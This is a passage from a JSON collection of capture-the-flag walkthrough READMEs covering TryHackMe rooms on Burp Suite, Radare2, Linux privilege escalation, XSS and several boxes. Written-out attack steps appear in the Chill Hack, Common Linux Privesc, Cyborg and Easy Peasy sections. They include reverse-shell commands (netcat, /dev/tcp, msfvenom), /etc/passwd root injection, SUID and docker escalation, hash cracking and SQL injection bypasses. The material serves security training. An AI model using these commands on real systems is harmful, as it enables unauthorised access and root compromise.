answer needed\n\n- Go ahead and install this now!\n\n\t no answer needed\n\n- Next, we'll move onto adding the certificate for Burp!\n\n\t no answer needed\n\n- With Firefox, navigate to the following address: http://localhost:8080\n\n\t no answer needed\n\n- Click on 'CA Certificate' in the top right to download and save the CA Certificate.\n\n\t no answer needed\n\n- Click on 'View Certificates'\n\n\t no answer needed\n\n- Next, in the Authorities tab click on 'Import'\n\n\t no answer needed\n\n- Navigate to where you saved the CA Certificate we downloaded previously. Click 'OK' once you've selected this certificate.\n\n\t no answer needed\n\n- Select 'OK' once you've done this. Congrats, we've now installed the Burp Suite CA Certificate!\n\n\t no answer needed\n\n- Which tool in Burp Suite can we use to perform a 'diff' on responses and other pieces of data?\n\n\t- `Comparer`\n\n- What tool could we use to analyze randomness in different pieces of data such as password reset tokens?\n\n\t- `Sequencer`\n\n- Which tool can we use to set the scope of our project?\n\n\t- `Target`\n\n- While only available in the premium versions of Burp Suite, which tool can we use to automatically identify different vulnerabilities in the application we are examining?\n\n\t- `Scanner`\n\n- Encoding or decoding data can be particularly useful when examining URL parameters or protections on a form, which tool allows us to do just that?\n\n\t- `Decoder`\n\n- Which tool allows us to redirect our web traffic into Burp for further examination?\n\n\t- `Proxy`\n\n- Simple in concept but powerful in execution, which tool allows us to reissue requests?\n\n\t- `Repeater`\n\n- With four modes, which tool in Burp can we use for a variety of purposes such as field fuzzing?\n\n\t- `Intruder`\n\n- Last but certainly not least, which tool allows us to modify Burp Suite via the addition of extensions?\n\n\t- `Extender`\n\n- With Burp Suite launched, let's first navigate to the 'User options' tab.\n\n\t no answer needed\n\n- Next, click on the 'Display' sub-tab.\n\n\t no answer needed\n\n- Now, click on the 'Look and feel' drop-down menu. Select 'Darcula'.\n\n\t no answer needed\n\n- Finally, close and relaunch Burp Suite to have dark theme (or whichever theme you picked) take effect.\n\n\t no answer needed\n\n- Deploy the VM attached to this task!\n\n\t no answer needed\n\n- By default, the Burp Suite proxy listens on only one interface. What is it? Use the format of IP:PORT\n\n\t- `127.0.0.1:8080`\n\n- In Burp Suite, navigate to the Intercept sub-tab of the Proxy section. Enable Intercept\n\n\t no answer needed\n\n- Take a look at the actions, which shortcut allows us to forward the request to Repeater?\n\n\t- `CRTL-r`\n\n- How about if we wanted to forward our request to Intruder?\n\n\t- `CTRL-i`\n\n- What is the name of the first section wherein general web requests (GET/POST) are saved?\n\n\t- `http history`\n\n- what is the name of the second section of our saved history in Burp Suite?\n\n\t- `websockets history`\n\n- Here we can apply further fine-grained rules to define which requests we would like to intercept. Perhaps the most useful out of the default rules is our only AND rule. What is it's match type?\n\n\t- `url`\n\n- How about it's 'Relationship'?\n\n\t- `is in target scope`\n\n- Before leaving the Proxy tab, switch Intercept to disabled. We'll still see the pages we navigate to in our history and the target tab, just having Intercept constantly stopping our requests for this next bit will get old fast.\n\n\t no answer needed\n\n- Navigate to the Target tab in Burp. In our last task, Proxy, we browsed to the website on our target machine (in this case OWASP Juice Shop). Find our target site in this list and right-click on it. Select 'Add to scope'.\n\n\t no answer needed\n\n- Clicking 'Add to scope' will trigger a pop-up. This will stop Burp from sending out-of-scope items to our site map.\n\n\t no answer needed\n\n- Select 'Yes' to close the popup.\n\n\t no answer needed\n\n- What do we call this representation of the collective web application?\n\n\t- `site map`\n\n- What is the term for browsing the application as a normal user prior to examining it further?\n\n\t- `happy path`\n\n- One last thing before moving on. Within the target tab, you may have noticed a sub-tab for issue definitions. Click into that now.\n\n\t no answer needed\n\n- Which poisoning issue arises when an application behind a cache process input that is not included in the cache key?\n\n\t- `web cache poisoning`\n\n- To start, click 'Account' (this might be 'Login' depending on the version of Juice Shop) in the top right corner of Juice Shop in order to navigate to the login page.\n\n\t no answer needed\n\n- Try logging in with invalid credentials. What error is generated when login fails?\n\n\t- `Invalid email or password.`\n\n- But wait, didn't we want to send that request to Repeater? Even though we didn't send it to Repeater initially via intercept, we can still find the request in our history. Switch over to the HTTP sub-tab of Proxy. Look through these requests until you find our failed login attempt. Right-click on this request and send it to Repeater and then send it to Intruder, too!\n\n\t no answer needed\n\n- Now that we've sent the request to Repeater, let's try adjusting the request such that we are sending a single quote (') as both the email and password. What error is generated from this request?\n\n\t- `SQLITE_ERROR`\n\n- Now that we've leveraged Repeater to gain proof of concept that Juice Shop's login is vulnerable to SQLi, let's try something a little more mischievous and attempt to leave a devastating zero-star review. First, click on the drawer button in the top-left of the application. If this isn't present for you, just skip to the next question.\n\n\t no answer needed\n\n- Next, click on 'Customer Feedback' (depending on the version of Juice Shop this also might be along the top of the page next to 'Login' under 'Contact Us')\n\n\t no answer needed\n\n- With the Burp proxy on submit feedback. Once this is done, find the POST request in your HTTP History in Burp and send it to Repeater.\n\n\t no answer needed\n\n- What field do we have to modify in order to submit a zero-star review?\n\n\t- `rating`\n\n- Submit a zero-star review and complete this challenge in Juice Shop!\n\n\t no answer needed\n\n- Which attack type allows us to select multiple payload sets (one per position) and iterate through them simultaneously?\n\n\t- `pitchfork`\n\n- How about the attack type which allows us to use one payload set in every single position we've selected simultaneously?\n\n\t- `Battering ram`\n\n- Which attack type allows us to select multiple payload sets (one per position) and iterate through all possible combinations?\n\n\t- `cluster bomb`\n\n- Perhaps the most commonly used, which attack type allows us to cycle through our payload set, putting the next available payload in each position in turn?\n\n\t- `sniper`\n\n- Download the wordlist attached to this room, this is a shortened version of the fuzzdb SQLi platform detection list.\n\n\t no answer needed\n\n- Return to the Intruder in Burp. In our previous task, we passed our failed login attempt to both Repeater and Intruder for further examination. Open up the Positions sub-tab in the Intruder tab with this request now and verify that 'Sniper' is selected as our attack type.\n\n\t no answer needed\n\n- Burp attempts to automatically highlight possible fields of interest for Intruder, however, it doesn't have it quite right for what we'll be looking at in this instance. Hit 'Clear' on the right-hand side to clear all selected fields.\n\n\t no answer needed\n\n- Next, let's highlight the email field between the double quotes (\"). This will be whatever you entered in the email field for our previous failed login attempt.\n\n\t no answer needed\n\n- Now click 'Add' to select our email field as a position for our payloads.\n\n\t no answer needed\n\n- Next, let's switch to the payloads sub-tab of Intruder. Once there, hit 'Load' and select the wordlist you previously downloaded in question five that is attached to this task.\n\n\t no answer needed\n\n- Almost there! Scroll down and uncheck 'URL-encode these characters'. We don't want to have the characters sent in our payloads to be encoded as they otherwise won't be recognized by SQL.\n\n\t no answer needed\n\n- Finally, click 'Start attack'. What is the first payload that returns a 200 status code, showing that we have successfully bypassed authentication?\n\n\n\t- `** ** *****`\n\n- Switch over to the HTTP history sub-tab of Proxy. \n\n\t no answer needed\n\n- We're going to dig for a response which issues a cookie. Parse through the various responses we've received from Juice Shop until you find one that includes a 'Set-Cookie' header. \n\n\t no answer needed\n\n- Once you've found a request response that issues a cookie, right-click on the request and select 'Send to Sequencer'.\n\n\t no answer needed\n\n- Change over Sequencer and select 'Start live capture'\n\n\t no answer needed\n\n- Let Sequencer run and collect ~10,000 requests. Once it hits roughly that amount hit 'Pause' and then 'Analyze now'\n\n\t no answer needed\n\n- Parse through the results. What is the effective estimated entropy measured in?\n\n\t- `bits`\n\n- In order to find the usable bits of entropy we often have to make some adjustments to have a normalized dataset. What item is converted in this process?\n\n\t- `token`\n\n- Read through the remaining results of the token analysis\n\n\t no answer needed\n\n- Let's first take a look at decoder by revisiting an old friend. Previously we discovered the scoreboard within the site JavaScript. Return to our target tab and find the API endpoint highlighted in the following request.\n\n\t no answer needed\n\n- Copy the first line of that request and paste it into Decoder. Next, select 'Decode as ...' URL\n\n\t no answer needed\n\n- What character does the %20 in the request we copied into Decoder decode as?\n\n\t- `space`\n\n- Similar to CyberChef, Decoder also has a 'Magic' mode where it will automatically attempt to decode the input it is provided. What is this mode called? \n\n\t- `smart decode`\n\n- What can we load into Comparer to see differences in what various user roles can access? This is very useful to check for access control issues.\n\n\t- `site maps`\n\n- Comparer can perform a diff against two different metrics, which one allows us to examine the data loaded in as-is rather than breaking it down into bytes?\n\n\t- `words`\n\n- To start, let's go ahead and switch over to the Options sub-tab of the Extender tab. \n\n\t no answer needed\n\n- Scroll down until you reach the 'Python Environment' section. Note, Burp requires the standalone edition of Jython.\n\n\t no answer needed\n\n- Download the standalone version of Jython from here: [Link](https://www.jython.org/download.html) - I suggest saving this or moving it to your Documents folder\n\n\t no answer needed\n\n- Return back to Burp and hit 'Select file' under the Python Environment subsection for Jython standalone. Navigate to where you just downloaded this file and select it.\n\n\t no answer needed\n\n- Burp is now set to go for installing extensions. Switch to the BApp Store sub-tab of Extender and look through the various extensions offered.\n\n\t no answer needed\n\n- Which extension allows us too bookmark various requests?\n\n\t- `bookmarks`\n\n- Download the report attached to this task. What is the only critical issue?\n\n\t- `Cross-origin resource sharing: arbitrary origin trusted`\n\n- How many 'Certain' low issues did Burp find?\n\n\t- `12`\n\n- Check out the provided links and keep learning!\n\n\t no answer needed\n\n\n\n" }, { "path": "CC:-Radare2/README.md", "content": "# CC: Radare2\n\n- Read the above \n\n\t no answer needed\n\n- What flag you set to analyze the binary upon entering the r2 console (equivalent to running aaa once your inside the console)\n\n\t- `-a`\n\n- How do you enable the debugger?\n\n\t- `-d`\n\n- How do you open the file in write mode?\n\n\t- `-w`\n\n- How do you enter the console without opening a file\n\n\t- `-`\n\n- What command \"Analyzes Everything\" (all functions and their arguments: Same as running with radare with -A)\n\n\t- `aaa`\n\n- What command does basic analysis on functions?\n\n\t- `af`\n\n- How do you list all functions?\n\n\t- `afl`\n\n- How many functions are in the example1 binary?\n\n\t- `r2 -d example1`\n\t- `aaa`\n\t- `afl`\n\t- `12`\n\n- What is the name of the secret function in the example1 binary?\n\n\t- `secret_func`\n\n- What command shows all the information about the file that you're in?\n\n\t- `iA`\n\n- How do you get every string that is present in the binary?\n\n\t- `izz`\n\n- What if you want the address of the main function?\n\n\t- `iM`\n\n- What character do you add to the end of every command to get the output in JSON format?\n\n\t- `j`\n\n- How do you get the entrypoint of the file?\n\n\t- `ie`\n\n- What is the secret string hidden in the example2 binary?\n\n\t- `r2 -d example2`\n\t- `aaa`\n\t- `izz`\n\t- `*******`\n\n- How do you print out the the current memory address your located at in the binary?\n\n\t- `s`\n\n- What command do you use to go to a specific point in memory with the syntax `
`?\n\n\t- `s`\n\n- What command would you run to go 5 bytes forward?\n\n\t- `s+ 5`\n\n- What about 12 bytes backward?\n\n\t- `s- 12`\n\n- How do you undo the previous seek?\n\n\t- `s-`\n\n- How would go to the memory address of the main function?\n\n\t- `s main`\n\n- What if you wanted to go to the address of the rax register?\n\n\t- `sr rax`\n\n- Play around with the s command in the example1 and example2 binaries\n\n\t no answer needed\n\n- How would you print the hex output of where you currently are in memory?\n\n\t- `px`\n\n- How would you print the disassembly of where you're currently at in memory?\n\n\t- `pd`\n\n- What if you wanted the disassembly of the main function?\n\n\t- `pd f main`\n\n- What command prints out the emoji hexdump? (this is not useful at all I just find it funny)\n\n\t- `pxe`\n\n- What if you decided you were too good for rows and you wanted the disassembly in column format?\n\n\t- `pc`\n\n- What is the value of the first variable in the main function for the example 3 binary?\n\n\t- `r2 -d example3`\n\t- `aaa`\n\t- `pdf @ main`\n\t- `1`\n\n- What about the second variable?\n\n\t- `5`\n\n- How many functions are in the binary?\n\n\t- `r2 -d midterm`\n\t- `aaa`\n\t- `afl`\n\t- `13`\n\n- What is the value of the hidden string?\n\n\t- `izz`\n\t- `you*******me`\n\n- What is the return value of `secret_func()`?\n\n\t- `pdf @ sym.secret_func`\n\t- `4`\n\n- What is the value of the first variable set in the main function(in decimal format)?\n\n\t- `pdf @ main`\n\t- `12`\n\n- What about the second one(also in decimal format)?\n\n\t- `192`\n\n- What is the next function in memory after the main function?\n\n\t- `afl`\n\t- `*******_func`\n\n- How do you get a hexdump of four bytes of the memory address your currently at?\n\n\t- `px 2`\n\n- How do you set a breakpoint?\n\n\t- `db`\n\n- What command is used to print out the values of all the registers?\n\n\t- `dr`\n\n- How do you run through the program until the program either ends or you hit the next breakpoint?\n\n\t- `dc`\n\n- What if you want to step through the binary one line at a time?\n\n\t- `ds`\n\n- How do you go forth 2 lines in the binary?\n\n\t- `ds 2`\n\n- How do you list out the indexes and memory addresses of all breakpoints?\n\n\t- `dbi`\n\n- Go back through all previous binaries and mess around with debug mode.\n\n\t no answer needed\n\n- How do you enter \"graph mode\" which allows everything to be organized in nice readable boxes?(A personal favorite of mine. Also note that the second character is uppercase)\n\n\t- `vV`\n\n- What character do you press to run normal radare commands inside visual mode?\n\n\t- `:`\n\n- How do you go back to the regular radare shell(leaving visual mode)?\n\n\t- `q`\n\n- What if you want to step through the binary inside Visual mode?\n\n\t- `s`\n\n- How do you add a comment?\n\n\t- `;`\n\n- Look through any of the binaries in Visual Mode and see just how much more beautiful everything looks.\n\n\tno answer needed\n\n- How do you write a string to the current memory address.\n\n\t- `w`\n\n- What command lists all write changes?\n\n\t- `wc`\n\n- What command modifies an instruction at the current memory address?\n\n\t- `wa`\n\n- Get the example4 binary to show the You win! message\n\n\t no answer needed\n\n- What is the password that outputs the you win! message?\n\n\t- `r2 -d the_final_exam`\n\t- `aaa`\n\t- `afl`\n\t- `pdf @ main`\n\t- `pdf @ sym.get_password`\n\t- `db 0x5635b2cf682f`\n\t- `dc`\n\t- `edordottt`\n\t- `dr`\n\t- `s 0xffffffffffffffda`\n\t- `px 10`\n\t- `onykbnyddd`\n\t- So it's ROT-10\n\t- `********`\n\n\n\n" }, { "path": "CTF-collection-Vol.1/README.md", "content": "# CTF collection Vol.1\n\n- High five!\n\n\t no answer needed\n\n- Feed me the flag!\n\n\t- `echo \"VEhNe2p1NTdfZDNjMGQzXzdoM19iNDUzfQ==\" | base64 -d`\n\t- `THM{********************}`\n\n- I'm hungry, I need the flag.\n\n\t- `exiftool Findme.jpg`\n\t- `THM{************}`\n\n- It is sad. Feed me the flag.\n\n\t- `steghide info Extinction.jpg` and then `y`\n\t- `steghide extract -sf Extinction.jpg` and then enter (without passphrase)\n\t- `cat Final_messge.txt`\n\t- `THM{********************************}`\n\n- Did you find the flag?\n\n\t- Highlight the text or check the page source code.\n\t- `THM{**********}`\n\n- More flag please!\n\n\t- Download the image and check the QR code.\n\t- `THM{*****************}`\n\n- Found the flag?\n\n\t- `strings hello.hello | grep THM`\n\t- `THM{******************}`\n\n- Oh, Oh, Did you get it?\n\n\t- Visit [CyberChef](https://gchq.github.io/CyberChef)\n\t- Recipe from Base58\n\t- `THM{*********************}`\n\n- What did you get?\n\n\t- Caesar Cipher (19)\n\t- `THM{***************}`\n\n- I'm hungry now... I need the flag\n\n\t- Check the HTML source code\n\t- `THM{***********************}`\n\n- What is the content?\n\n\t- `xxd --plain spoil.png > hex.txt`\n\t- Replace the first 8 characters with `89504E47`\n\t- Go to Cyberchef and the recipe is `From Hex` and then `Render Image`.\n\t- `THM{**********}`\n\n- Did you found the hidden flag?\n\n\t- Just search `Tryhackme reddit`\n\t- `THM{********************************}`\n\n- Can you decode it?\n\n\t- Search on Google for BinaryFuck Interpreter\n\t- `THM{**********}`\n\n- Did you crack it? Feed me now!\n\n\t- [XOR Calculator](http://xor.pw/#) and output as ASCII.\n\t- `THM{************}`\n\n- Flag! Flag! Flag!\n\n\t- `binwalk hell.jpg -e`\n\t- `cd _hell.jpg.extracted`\n\t- `cat hello_there.txt`\n\t- `THM{****************}`\n\n- What does the flag said?\n\n\t- `wget http://www.caesum.com/handbook/Stegsolve.jar -O stegsolve.jar\nchmod +x stegsolve.jar`\n\t- `./stegsolve.jar`\n\t- Open the dark.png file and try to see the flag with the arrows.\n\t- `THM{**********************}`\n\n- What does the bot said?\n\n\t- Follow the link on the QR code and play the track.\n\t- `THM{**********}`\n\n- Did you found my past?\n\n\t- Use wayback (https://web.archive.org/web/20200102131252/https://www.embeddedhacker.com/)\n\t- Load the snapshot on Jan 2, 2020.\n\t- Search for string `THM{` on the page.\n\t- `THM{******************}`\n\n- The deciphered text\n\n\t- Input `MYKAHODTQ{RVG_YVGGK_FAL_WXF}` in [CyberChef](https://gchq.github.io/CyberChef/) with recipe Vigenere Decode and key=TRYHACKME.\n\t- Output is `THMTHMTHM{*****************}`\n\t- Change the key to `THMTHMTHM`\n\t- `TRYHACKME{*****************}`\n\n- What is the flag?\n\n\t- `python3`\n\t- `n = 581695969015253365094191591547859387620042736036246486373595515576333693`\n\t- `h = hex(n)[2:]`\n\t- `bytearray.fromhex(h).decode()`\n\t- `THM{***********************}`\n\n- Did you captured my neighbor's flag?\n\n\t- Open the file with Wireshark.\n\t- `THM{****************}`\n\n\n\n\n" }, { "path": "Chill-Hack/README.md", "content": "# Chill Hack\n\n- User Flag\n\n\t- `scilla port -target -p -1000`\n\t- `ftp `\n\t- `anonymous`, no password\n\t- `get note.txt`\n\t- `scilla dir -target `\n\t- secret directory found.\n\t- Execute `cat /etc/passwd`. ahahhahahahahahahhaa.\n\t- So, execute `cat&1|nc 1234 >/tmp/f`\n\t- Cool.\n\t- `python3 -c 'import pty;pty.spawn(\"/bin/bash\")'`\n\t- `cd /home`\n\t- `sudo -l`\n\t- `cd apaar`\n\t- `sudo -u apaar /home/apaar/.helpline.sh`\n\t- `/bin/sh` and `/bin/sh`\n\t- `id`\n\t- `cat local.txt`\n\t- `{USER-FLAG: *********************************}`\n\n- Root Flag\n\n\t- `wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh`\n\t- `python3 -m http.server`\n\t- On target `curl :8000/LinEnum.sh > linenum.sh`\n\t- `chmod +x linenum.sh`\n\t- `./linenum.sh`\n\t~~~\n\t[-] Listening TCP:\n\tActive Internet connections (only servers)\n\tProto Recv-Q Send-Q Local Address Foreign Address State PID/Program name \n\ttcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN - \n\ttcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - \n\ttcp 0 0 127.0.0.1:9001 0.0.0.0:* LISTEN - \n\ttcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -\n\t~~~\n\t- On your machine `ssh-keygen`\n\t- `cd ~/.ssh`\n\t- `python3 -m http.server`\n\t- On target `curl :8000/id_rsa.pub > ~/.ssh/authorized_keys`\n\t- `chmod 600 id_rsa`\n\t- `ssh -L 9001:127.0.0.1:9001 -i id_rsa apaar@`\n\t- `cat /var/www/files/index.php`\n\t- Found username and password for MySQL database.\n\t- `mysql -u root -p` and enter the password found.\n\t- `show databases;`\n\t- `use webportal;`\n\t- `show tables;`\n\t- `select * from users;`\n\t- Save those two hashes\n\t- `john --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt`\n\t- Login into the website at localhost:9001\n\t- Download the image and execute `steghide extract -sf hacker-with-laptop_23-2147985341.jpg`\n\t- `fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip`\n\t- Inspect `source_code.php`\n\t- `echo ******************** | base64 -d`\n\t- `su anurodh` and enter password\n\t- `docker images`\n\t- `docker run -v /root:/mnt -it alpine`\n\t- `cat /mnt/proof.txt`\n\t- `{ROOT-FLAG: ********************************}`\n\n\n\n\n\n" }, { "path": "Common-Linux-Privesc/README.md", "content": "# Common Linux Privesc\n\n- Deploy the machine\n\n\t no answer needed\n\n- Read the information about privilege escalation\n\n\t no answer needed\n\n- Understand the difference between Horizontal and Vertical privilege escalation.\n\n\t no answer needed\n\n- First, lets SSH into the target machine, using the credentials user3:password. This is to simulate getting a foothold on the system as a normal privilege user.\n\n\t- `ssh user3@`, `yes` and insert password.\n\t- On your machine `wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh`\n\t- On your machine `sudo python3 -m http.server`\n\t- On target `wget http://:8000/LinEnum.sh`\n\t- `chmod +x LinEnum.sh`\n\t- `./LinEnum.sh`\n\n- What is the target's hostname?\n\n\t- `polobox`\n\n- Look at the output of /etc/passwd how many \"user[x]\" are there on the system?\n\n\t- `8`\n\n- How many available shells are there on the system?\n\n\t- `4`\n\n- What is the name of the bash script that is set to run every 5 minutes by cron?\n\n\t- `autoscript.sh`\n\n- What critical file has had its permissions changed to allow some users to write to it?\n\n\t- `/etc/passwd`\n\n- Well done! Bear the results of the enumeration stage in mind as we continue to exploit the system!\n\n\t no answer needed\n\n- What is the path of the file in user3's directory that stands out to you?\n\n\t- `/home/user3/shell`\n\n- We know that \"shell\" is an SUID bit file, therefore running it will run the script as a root user! Lets run it! We can do this by running: \"./shell\"\n\n\t no answer needed\n\n- Congratulations! You should now have a shell as root user, well done!\n\n\t no answer needed\n\n- First, let's exit out of root from our previous task by typing \"exit\". Then use \"su\" to swap to user7, with the password \"password\"\n\n\t no answer needed\n\n- Having read the information above, what direction privilege escalation is this attack?\n\n\t- `vertical`\n\n- Before we add our new user, we first need to create a compliant password hash to add! We do this by using the command: \"openssl passwd -1 -salt [salt] [password]\" What is the hash created by using this command with the salt, \"new\" and the password \"123\"?\n\n\t- `***********************`\n\n- Great! Now we need to take this value, and create a new root user account. What would the /etc/passwd entry look like for a root user with the username \"new\" and the password hash we created before?\n\n\t- Read the hint\n\t- `*************************************************`\n\n- Great! Now you've got everything you need. Just add that entry to the end of the /etc/passwd file!\n\n\t no answer needed\n\n- Now, use \"su\" to login as the \"new\" account, and then enter the password. If you've done everything correctly- you should be greeted by a root prompt! Congratulations!\n\n\t no answer needed\n\n- First, let's exit out of root from our previous task by typing \"exit\". Then use \"su\" to swap to user8, with the password \"password\"\n\n\t no answer needed\n\n- Let's use the \"sudo -l\" command, what does this user require (or not require) to run vi as root?\n\n\t- `NOPASSWD`\n\n- So, all we need to do is open vi as root, by typing \"sudo vi\" into the terminal.\n\n\t no answer needed\n\n- Now, type \":!sh\" to open a shell!\n\n\t no answer needed\n\n- First, let's exit out of root from our previous task by typing \"exit\". Then use \"su\" to swap to user4, with the password \"password\"\n\n\t no answer needed\n\n- Now, on our host machine- let's create a payload for our cron exploit using msfvenom.\n\n\t no answer needed\n\n- What is the flag to specify a payload in msfvenom?\n\n\t- `-p`\n\n- Create a payload using: `msfvenom -p cmd/unix/reverse_netcat lhost=LOCALIP lport=8888 R`\n\n\t no answer needed\n\n- What directory is the \"autoscript.sh\" under?\n\n\t- `/home/user4/Desktop`\n\n- Lets replace the contents of the file with our payload using: \"echo [MSFVENOM OUTPUT] > autoscript.sh\"\n\n\t no answer needed\n\n- After copying the code into autoscript.sh file we wait for cron to execute the file, and start our netcat listener using: \"nc -lvp 8888\" and wait for our shell to land!\n\n\t no answer needed\n\n- After about 5 minutes, you should have a shell as root land in your netcat listening session! Congratulations! \n\n\t no answer needed\n\n- Going back to our local ssh session, not the netcat root session, you can close that now, let's exit out of root from our previous task by typing \"exit\". Then use \"su\" to swap to user5, with the password \"password\"\n\n\t no answer needed\n\n- Let's go to user5's home directory, and run the file \"script\". What command do we think that it's executing?\n\n\t- `ls`\n\n- Now we know what command to imitate, let's change directory to \"tmp\".\n\n\t no answer needed\n\n- Now we're inside tmp, let's create an imitation executable. The format for what we want to do is: echo \"[whatever command we want to run]\" > [name of the executable we're imitating] What would the command look like to open a bash shell, writing to a file with the name of the executable we're imitating\n\n\t- `echo \"/bin/bash\" > ls`\n\n- Great! Now we've made our imitation, we need to make it an executable. What command do we execute to do this?\n\n\t- `chmod +x ls`\n\n- Now, we need to change the PATH variable, so that it points to the directory where we have our imitation \"ls\" stored! We do this using the command \"export PATH=/tmp:$PATH\". Note, this will cause you to open a bash prompt every time you use \"ls\". If you need to use \"ls\" before you finish the exploit, use \"/bin/ls\" where the real \"ls\" executable is. Once you've finished the exploit, you can exit out of root and use \"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:$PATH\" to reset the PATH variable back to default, letting you use \"ls\" again!\n\n\t no answer needed\n\n- Now, change directory back to user5's home directory.\n\n\t no answer needed\n\n- Now, run the \"script\" file again, you should be sent into a root bash prompt! Congratulations!\n\n\t no answer needed\n\n- Well done, you did it!\n\n\t no answer needed\n\n\n\n\n" }, { "path": "Cross-site-Scripting/README.md", "content": "# Cross-site Scripting\n\n- Read the introduction.\n\n\t no answer needed\n\n- Deploy the machine and navigate to http://\n\n\t no answer needed\n\n- The machine you deployed earlier will guide you though exploiting some cool vulnerabilities, stored XSS has to offer. There are hints for answering these questions on the machine.\n\n\t no answer needed\n\n- Add a comment and see if you can insert some of your own HTML.\n\n\t- `

comment

`\n\t- `HTML_****`\n\n- Create an alert popup box appear on the page with your document cookies.\n\n\t- ``\n\t- `W3LL_***********`\n\n- Change \"XSS Playground\" to \"I am a hacker\" by adding comments and using Javascript.\n\n\t- ` `\n\t- `websites****************************`\n\n- Take over Jack's account by stealing his cookie, what was his cookie value?\n\n\t- `s%3Aat0YY*******************************************************`\n\n- Post a comment as Jack.\n\n\t- `c00k***********`\n\n- Craft a reflected XSS payload that will cause a popup saying \"Hello\"\n\n\t- ``\n\t- `There**************************`\n\n- Craft a reflected XSS payload that will cause a popup with your machines IP address.\n\n\t- ``\n\t- `Ref***************`\n\n- Look at the deployed machines DOM-Based XSS page source code, and figure out a way to exploit it by executing an alert with your cookies.\n\n\t- `test ' onmouseover=\"alert(document.cookie)\"`\n\t- `Br******************`\n\n- Create an onhover event on an image tag, that change the background color of the website to red.\n\n\t- `test \" onhover=\"document.body.style.backgroundColor='red'`\n\t- `Jav**************`\n\n- Understand the basic proof of concept script.\n\n\t no answer needed\n\n- Create your own version of an XSS keylogger and see it appear in the logs part of the site.\n\n\t no answer needed\n\n- Bypass the filter that removes any script tags.\n\n\t- ``\n\t- `3c3cf****************************`\n\n- The word alert is filtered, bypass it.\n\n\t- The same but with `confirm`.\n\t- `a2e5e*****************************`\n\n- The word hello is filtered, bypass it.\n\n\t- The same but with payload `Hi :)`.\n\t- `decb*****************************`\n\n- Filtered in challenge 4 is as follows...\n\n\t- ``\n\t- `2482d2****************************`\n\n- Download and experiment with BeEF with the XSS playground.\n\n\t no answer needed\n\n- Take a look at XSS-Payloads.com, download one interesting looking payload and use it on the XSS playground.\n\n\t no answer needed\n" }, { "path": "Cyborg/README.md", "content": "# Cyborg\n\n- Deploy the machine\n\n\t no answer needed\n\n- Scan the machine, how many ports are open?\n\n\t- `scilla port -target `\n\t- `*`\n\n- What service is running on port 22?\n\n\t- `ssh`\n\n- What service is running on port 80?\n\n\t- `http`\n\n- What is the user.txt flag?\n\n\t- Go to `/etc`\n\t- And you find `http:///etc/squid/passwd`\n\t- So you have found something like `username:password`.\n\t- `hash-identifier` and paste the password.\n\t- `echo password > hash`\n\t- `hashcat --force -m 1600 -a 0 hash /home/kali/rockyou.txt`\n\t- `ssh username@` and enter the password.\n\t- It seems a password file...\n\t- `scilla dir -target `\n\t- `/admin/` found!\n\t- Go to admin page and download the archive.tar file.\n\t- `tar -xvf archive.tar`\n\t- This is a [Borg](https://borgbackup.readthedocs.io/en/stable/) things.\n\t- Install borg.\n\t- `borg extract archive.tar::music_archive`\n\t- You found the ssh credentials.\n\t- `ssh ****@` and enter the password.\n\t- `cat user.txt`\n\t- `flag{************************************}`\n\n- What is the root.txt flag?\n\n\t- `sudo -l`\n\t- `cat /etc/mp3backups/backup.sh`\n\t- `sudo /etc/mp3backups/backup.sh -c \"chmod +s /bin/bash\"`\n\t- `bash -p`\n\t- `cat /root/root.txt`\n\t- `flag{***********************************}`\n" }, { "path": "Easy-Peasy/README.md", "content": "# Easy Peasy\n\n- How many ports are open?\n\n\t- `nmap `\n\t- `3`\n\n- What is the version of nginx?\n\n\t- `nmap -sV `\n\t- `1.16.1`\n\n- What is running on the highest port?\n\n\t- `apache`\n\n- Using GoBuster, find flag 1.\n\n\t- `gobuster dir -u http:/// -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt`\n\t- We find `/hidden`.\n\t- Go in depth. `gobuster dir -u http:///hidden/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt`\n\t- We find `/whatever`\n\t- Inspect page source.\n\t- `ZmxhZ3tmMXJzN19mbDRnfQ==`\n\t- `echo -n ZmxhZ3tmMXJzN19mbDRnfQ== | base64 -d`\n\t- `flag{f1rs7_fl4g}`\n\n- Further enumerate the machine, what is flag 2?\n\n\t- I remember you there is another server public exposed. Go to `http://:65524`.\n\t- With the same previous command of gobuster we can see there is a robots.txt file.\n\t- `a18672860d0510e5ab6699730763b250`\n\t- `hash-identifier`\n\t- Just search on google\n\t- `flag{1m_s3c0nd_fl4g}`\n\n- Crack the hash with easypeasy.txt, What is the flag 3?\n\n\t- Inspect source code of default Apache page.\n\t- `flag{9fdafbd64c47471a8f54cd3fc64cd312}`\n\n- What is the hidden directory?\n\n\t- Looking at the second server (apache) index page source code I found `its encoded with ba....:ObsJmP173N2X6dOrAgEAL0Vu`.\n\t- Play a bit with CyberChef.\n\t- `/n0th1ng3ls3m4tt3r` (base62).\n\t\n- Using the wordlist that provided to you in this task crack the hash\nwhat is the password?\n\n\t- Go to this directory with a browser and inspect source code.\n\t- `940d71e8655*********8ab85066**********418**********83e7f5fe6*d81`\n\t- `hash-identifier`\n\t- `john --wordlist=easypeasy.txt --format=gost hash.txt`\n\t- `mypass*************`\n\n- What is the password to login to the machine via SSH?\n\n\t- Download the central image on the page (`http://:65524/n0th1ng3ls3m4tt3r`)\n\t- `steghide extract -sf binarycodepixabay.jpg` and enter the password.\n\t- In the new file you will have a username and a binary password.\n\t- Just convert to text the binary code.\n\t- `***********************binary`\n\n- What is the user flag?\n\n\t- Login into ssh (not port 22, remember the output of nmap).\n\t- `cat user.txt`\n\t- This isn't the real flag. Just use ROT13.\n\t- `flag{n0wi************}`\n\n- What is the root flag?\n\n\t- Try to search something related to cronjob.\n\t- `cat /etc/crontab`\n\t- uuuuuuuuh `/var/www/.mysecretcronjob.sh`\n\t- This code will be executed as root, so:\n\t- Insert this on that file: `/bin/bash -i >& /dev/tcp//4444 0>&1`\n\t- On your machine `nc -lnvp 4444`\n\t- 